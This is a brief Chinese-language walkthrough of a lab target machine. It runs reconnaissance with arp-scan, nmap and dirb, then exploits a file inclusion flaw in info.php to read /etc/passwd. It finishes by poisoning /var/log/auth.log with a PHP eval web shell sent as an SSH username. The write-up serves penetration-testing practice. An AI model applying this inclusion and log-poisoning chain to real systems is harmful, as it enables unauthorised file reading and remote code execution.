1.获取ip地址
arp-scan -l
2.扫描端口及其服务
nmap -p- -sV -sC x.x.x.x
3.扫目录
dirb http://x.x.x.x/
4.尝试访问 /antibot_image/antibots/
5.根据修改时间发现info.php文件最新更新,访问并查看源码:
6.发现文件包含,尝试包含文件…/…/…/…/…/…/etc/passwd
7.漏洞利用
不难发现只有 root,tomato
两个用户具有 shell
2.目标靶机存在明显的文件包含漏洞
3.写入一句话木马:ssh '<?php @eval($_POST[1]); ?>'@x.x.x.x -p 2211
4.在网页端查看ubuntu报错信息:/var/log/auth.log